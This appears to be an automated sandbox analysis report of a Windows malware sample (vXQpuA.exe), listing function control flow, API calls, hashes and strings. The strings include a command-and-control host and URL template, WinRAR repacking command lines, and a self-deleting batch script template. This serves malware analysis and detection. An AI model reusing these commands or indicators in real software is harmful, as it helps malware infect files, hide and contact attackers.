                                                control_flow_graph 401 61239d-6123d6 strstr 402 612451-61247a CreateFileA GetFileSize 401->402 403 6123d8-6123e2 401->403 405 612480-612483 402->405 406 612675-612676 CloseHandle 402->406 404 6123ed-6123f1 403->404 408 6123f3-61241d 404->408 409 6123e4-6123ec 404->409 405->406 410 612489-612493 405->410 407 61267c-612681 RemoveDirectoryA 406->407 411 612687-61268f 407->411 408->402 412 61241f-612425 408->412 409->404 410->406 413 612499-61254b call 611915 CloseHandle memset strrchr wsprintfA strrchr memset * 2 wsprintfA Sleep call 61189d 410->413 415 612427-612436 412->415 416 61243a-612443 412->416 413->407 422 612551-612556 413->422 415->412 418 612438 415->418 416->411 419 612449 416->419 418->402 419->402 422->407 423 61255c-61261c Sleep memset wsprintfA call 6129e2 memset wsprintfA Sleep call 61189d Sleep CreateFileA call 611915 CloseHandle 422->423 423->407 430 61261e-612626 423->430 430->407 431 612628-61262c 430->431 432 612634-612640 431->432 433 61262e-612632 431->433 434 612641-612665 SetFilePointer WriteFile 432->434 433->434 434->407 435 612667-612673 SetEndOfFile 434->435 435->407
                                                APIs
                                                • strstr.MSVCRT ref: 006123CC
                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00612464
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00612472
                                                • CloseHandle.KERNEL32(?,00000000,00000000), ref: 006124A8
                                                • memset.MSVCRT ref: 006124B9
                                                • strrchr.MSVCRT ref: 006124C9
                                                • wsprintfA.USER32 ref: 006124DE
                                                • strrchr.MSVCRT ref: 006124ED
                                                • memset.MSVCRT ref: 006124F2
                                                • memset.MSVCRT ref: 00612505
                                                • wsprintfA.USER32 ref: 00612524
                                                • Sleep.KERNEL32(000007D0), ref: 00612535
                                                • Sleep.KERNEL32(000007D0), ref: 0061255D
                                                • memset.MSVCRT ref: 0061256E
                                                • wsprintfA.USER32 ref: 00612585
                                                • memset.MSVCRT ref: 006125A6
                                                • wsprintfA.USER32 ref: 006125CA
                                                • Sleep.KERNEL32(000007D0), ref: 006125D0
                                                • Sleep.KERNEL32(000007D0,?,?), ref: 006125E5
                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006125FC
                                                • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00612611
                                                • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00612642
                                                • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0061265B
                                                • SetEndOfFile.KERNEL32 ref: 0061266D
                                                • CloseHandle.KERNEL32(00000000), ref: 00612676
                                                • RemoveDirectoryA.KERNEL32(?), ref: 00612681
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                                • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2203340711-2750826870
                                                • Opcode ID: e5833b98aa60d7829c58d26d02b4704d7dffe51190f0019bc68034e01adacbcd
                                                • Instruction ID: d29305a30d1c4d73ae4f2543459749953b0431b80296214518ce14a78aefcb7c
                                                • Opcode Fuzzy Hash: e5833b98aa60d7829c58d26d02b4704d7dffe51190f0019bc68034e01adacbcd
                                                • Instruction Fuzzy Hash: 5981EFB1504305ABD710DF60DC48EEBBBEEFB88705F08491AF645D2290D7709A898BA6
                                                Function 0061274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 00612766
                                                • memset.MSVCRT ref: 00612774
                                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00612787
                                                • wsprintfA.USER32 ref: 006127AB
                                                  • Part of subcall function 0061185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
                                                  • Part of subcall function 0061185B: srand.MSVCRT ref: 00611878
                                                  • Part of subcall function 0061185B: rand.MSVCRT ref: 00611880
                                                  • Part of subcall function 0061185B: srand.MSVCRT ref: 00611890
                                                  • Part of subcall function 0061185B: rand.MSVCRT ref: 00611894
                                                • wsprintfA.USER32 ref: 006127C6
                                                • CopyFileA.KERNEL32(?,00614C80,00000000), ref: 006127D4
                                                • wsprintfA.USER32 ref: 006127F4
                                                  • Part of subcall function 00611973: PathFileExistsA.KERNELBASE(\Na`Na,00000000,C:\Users\user\AppData\Local\Temp\vXQpuA.exe), ref: 00611992
                                                  • Part of subcall function 00611973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006119BA
                                                  • Part of subcall function 00611973: Sleep.KERNEL32(00000064), ref: 006119C6
                                                  • Part of subcall function 00611973: wsprintfA.USER32 ref: 006119EC
                                                  • Part of subcall function 00611973: CopyFileA.KERNEL32(?,?,00000000), ref: 00611A00
                                                  • Part of subcall function 00611973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00611A1E
                                                  • Part of subcall function 00611973: GetFileSize.KERNEL32(?,00000000), ref: 00611A2C
                                                  • Part of subcall function 00611973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00611A46
                                                  • Part of subcall function 00611973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00611A65
                                                • DeleteFileA.KERNEL32(?,?,00614E54,00614E58), ref: 0061281A
                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00614E54,00614E58), ref: 00612832
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                                • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                                • API String ID: 692489704-613076915
                                                • Opcode ID: 15e9dd4a0b9731c3da93ed45c0e02bc8acf8e0dc5e159c636082fd85638452fd
                                                • Instruction ID: 99ddcd6f3c82f4a4693d06aa8e122afffab516f0324024e02aaa2eb2293fad81
                                                • Opcode Fuzzy Hash: 15e9dd4a0b9731c3da93ed45c0e02bc8acf8e0dc5e159c636082fd85638452fd
                                                • Instruction Fuzzy Hash: 1521A7F694022C7BDB10EBA49C89FDB77AEDB04745F0944A2B605E3141E670DFC48AA0
                                                Function 00611581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0061185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
                                                  • Part of subcall function 0061185B: srand.MSVCRT ref: 00611878
                                                  • Part of subcall function 0061185B: rand.MSVCRT ref: 00611880
                                                  • Part of subcall function 0061185B: srand.MSVCRT ref: 00611890
                                                  • Part of subcall function 0061185B: rand.MSVCRT ref: 00611894
                                                • wsprintfA.USER32 ref: 006115AA
                                                • wsprintfA.USER32 ref: 006115C6
                                                • lstrlen.KERNEL32(?), ref: 006115D2
                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 006115EE
                                                • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00611609
                                                • CloseHandle.KERNEL32(00000000), ref: 00611612
                                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0061162D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                                • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\vXQpuA.exe$open
                                                • API String ID: 617340118-1385103046
                                                • Opcode ID: 599c55488f01ca2a130f29a4e2ee38253271e9c739d5482064136c43223fe9b5
                                                • Instruction ID: 682dd6be1649bc4cf1145427bd67510adcabb956e54ac084ab20c58eadce3696
                                                • Opcode Fuzzy Hash: 599c55488f01ca2a130f29a4e2ee38253271e9c739d5482064136c43223fe9b5
                                                • Instruction Fuzzy Hash: 77119476A011387ED720D7A49C89DEB7BBDDF19311F080052F94AE2240DA709BC48BB0
                                                Function 0061120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00611400), ref: 00611226
                                                • GetProcAddress.KERNEL32(00000000), ref: 0061122D
                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00611400), ref: 0061123F
                                                • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00611400), ref: 00611250
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\vXQpuA.exe,?,?,?,?,00611400), ref: 0061129E
                                                • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\vXQpuA.exe,?,?,?,?,00611400), ref: 006112B0
                                                • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\vXQpuA.exe,?,?,?,?,00611400), ref: 006112F5
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00611400), ref: 0061130A
                                                Strings
                                                • ntdll.dll, xrefs: 00611219
                                                • ZwQuerySystemInformation, xrefs: 00611212
                                                • C:\Users\user\AppData\Local\Temp\vXQpuA.exe, xrefs: 00611262
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                                • String ID: C:\Users\user\AppData\Local\Temp\vXQpuA.exe$ZwQuerySystemInformation$ntdll.dll
                                                • API String ID: 1500695312-3879772653
                                                • Opcode ID: ab977b0bf03033fcf6d4b8769805b82876ed538d935d0c29cc7465caab51d712
                                                • Instruction ID: 985721c64ea5cc395d24c478363774f2c887ad37c5db5a3bdf41059701d51842
                                                • Opcode Fuzzy Hash: ab977b0bf03033fcf6d4b8769805b82876ed538d935d0c29cc7465caab51d712
                                                • Instruction Fuzzy Hash: 3F21D771605361ABD7209B65CC04BEBBAAAFB4AB01F184919F646DA340C770DBC4C7A5
                                                Function 00611000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGa,http://%s:%d/%s/%s,006110E8,?), ref: 00611018
                                                • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A78400), ref: 00611029
                                                • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00611038
                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0061104B
                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00611075
                                                • CloseHandle.KERNEL32(?), ref: 0061108B
                                                • CloseHandle.KERNEL32(00000000), ref: 0061108E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                                • String ID: HGa$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                • API String ID: 1223616889-3642003181
                                                • Opcode ID: 12b195d546a3f3772b7636684453fd69e175231f8f602ea36ecce1c467889698
                                                • Instruction ID: f2d3be2e2a63dfecc4ec3e3c9782bfd0088d76e2a1ea5dc42383253195b4c8fd
                                                • Opcode Fuzzy Hash: 12b195d546a3f3772b7636684453fd69e175231f8f602ea36ecce1c467889698
                                                • Instruction Fuzzy Hash: 98019B7150035CBFE7305F609C88EAB7BEEDB4879AF09452AF345A6290DA705E848B70
                                                Function 0061189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 006118B1
                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75920F00,75A78400), ref: 006118D3
                                                • CloseHandle.KERNEL32(I%a), ref: 006118E9
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006118F0
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00611901
                                                • CloseHandle.KERNEL32(?), ref: 0061190A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                                • String ID: I%a
                                                • API String ID: 876959470-1380773492
                                                • Opcode ID: 8a20773ffe8ef1e38377cc4d2965ed3136cfa0f98957d7a39b01080fbd3c7590
                                                • Instruction ID: cde36df8c25317c441865b7b1ab77e7c391a828d342c310b196f82e5228e60da
                                                • Opcode Fuzzy Hash: 8a20773ffe8ef1e38377cc4d2965ed3136cfa0f98957d7a39b01080fbd3c7590
                                                • Instruction Fuzzy Hash: 3A017176901128BBCB216B95DC48DDF7F7EEF85761F148022FA16A52A0D6314A58CBA0
                                                Function 0061185B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
                                                • srand.MSVCRT ref: 00611878
                                                • rand.MSVCRT ref: 00611880
                                                • srand.MSVCRT ref: 00611890
                                                • rand.MSVCRT ref: 00611894
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: Timerandsrand$FileSystem
                                                • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                • API String ID: 4106363736-3273462101
                                                • Opcode ID: 5b2a3ba0cc0e8a45e92f6f89c7fdc23e68e34c608cc2efe2e1651b208a42e24a
                                                • Instruction ID: c1b5b4cf5bb4b794c46a5da15c6d932d7a54522c4de6e93580757275ac153ae0
                                                • Opcode Fuzzy Hash: 5b2a3ba0cc0e8a45e92f6f89c7fdc23e68e34c608cc2efe2e1651b208a42e24a
                                                • Instruction Fuzzy Hash: 55E0D877A00228BBDB00A7F9EC468DEBBECDE88162B140567F601D3350E570FD448AB8
                                                Function 00612692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7591E800,?,?,006129DB,?,00000001), ref: 006126A7
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,7591E800,?,?,006129DB,?,00000001), ref: 006126B5
                                                • lstrlen.KERNEL32(?), ref: 006126C4
                                                • ??2@YAPAXI@Z.MSVCRT ref: 006126CE
                                                • lstrcpy.KERNEL32(00000004,?), ref: 006126E3
                                                • lstrcpy.KERNEL32(?,00000004), ref: 0061271F
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0061272D
                                                • SetEvent.KERNEL32 ref: 0061273C
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                                • String ID:
                                                • API String ID: 41106472-0
                                                • Opcode ID: 033bb5bc089729a6c342191777390dd8429d2f4298f9d39c64f25a78ad29ca7e
                                                • Instruction ID: e3b1c58b3940e7abda374c4e77bbbd2e0fdc09e083f16dbacfa785d18bee4ec2
                                                • Opcode Fuzzy Hash: 033bb5bc089729a6c342191777390dd8429d2f4298f9d39c64f25a78ad29ca7e
                                                • Instruction Fuzzy Hash: AA117C35900111AFCB219F15EC588DA7BABFF8476171C902BF455C7260DB308995DB90
                                                Function 00611B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • IBfgxFcHEYIoKBemTULDvZPZVmbgVzBsJQEXterXqmunObcRNonOXRudjiDoJsDUtnUdNCjKKHJlhfQAlMANfHrGwPTYjxyaklkhEOMqFAPvLdrIVcpzYQSwqkpeTCbwSaGtiphuzWvGsMWCRiyaLWxZSyFg, xrefs: 00611B8A, 00611B9C, 00611C15, 00611C49
                                                • .exe, xrefs: 00611C57
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: lstrcatmemcpymemsetrandsrand
                                                • String ID: .exe$IBfgxFcHEYIoKBemTULDvZPZVmbgVzBsJQEXterXqmunObcRNonOXRudjiDoJsDUtnUdNCjKKHJlhfQAlMANfHrGwPTYjxyaklkhEOMqFAPvLdrIVcpzYQSwqkpeTCbwSaGtiphuzWvGsMWCRiyaLWxZSyFg
                                                • API String ID: 122620767-317181783
                                                • Opcode ID: a8fc8e844b9c1b2fc0f9613b993873091971a75911fa9791c0df29325a856514
                                                • Instruction ID: ecb8549ff3b7afa9f0a006c442787cc1df0b38573a911927a68794d2c5b03a3d
                                                • Opcode Fuzzy Hash: a8fc8e844b9c1b2fc0f9613b993873091971a75911fa9791c0df29325a856514
                                                • Instruction Fuzzy Hash: 7521A032E481A06ED75513357C41BED3F478FE7711F2E909AF6861F3B2D56809C682A4
                                                Function 00611319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00611334
                                                • GetProcAddress.KERNEL32(00000000), ref: 0061133B
                                                • memset.MSVCRT ref: 00611359
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProcmemset
                                                • String ID: NtSystemDebugControl$ntdll.dll
                                                • API String ID: 3137504439-2438149413
                                                • Opcode ID: 51e527ade14706774fe669877adbc859691ee54b1697698487eb4aa8e2dbdc1c
                                                • Instruction ID: 78a7aec5fdf026b9ac8cb92c97bdedef9be55be53ea7163f3b40c93f0e5bfd36
                                                • Opcode Fuzzy Hash: 51e527ade14706774fe669877adbc859691ee54b1697698487eb4aa8e2dbdc1c
                                                • Instruction Fuzzy Hash: 6801C47160034DBFDB10DF94EC859EFBBBAFB05304F08452BFA12A6240D7708685CA90
                                                Function 00611DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: strrchr$lstrcmpilstrcpylstrlen
                                                • String ID:
                                                • API String ID: 3636361484-0
                                                • Opcode ID: bee0c466b6ea2f0bd31487d03acc8b04de4645deb6edd15fd5af5ef48e315a9c
                                                • Instruction ID: 70c8c8ec320e6e42b55024cf691f3d360f9a00e9c5fbcbf0844b3361ca4f8d26
                                                • Opcode Fuzzy Hash: bee0c466b6ea2f0bd31487d03acc8b04de4645deb6edd15fd5af5ef48e315a9c
                                                • Instruction Fuzzy Hash: FD01FE729042696FEB1057A0EC48BD67BDEDB05311F0C4067DB46D7190EA749AC4CB90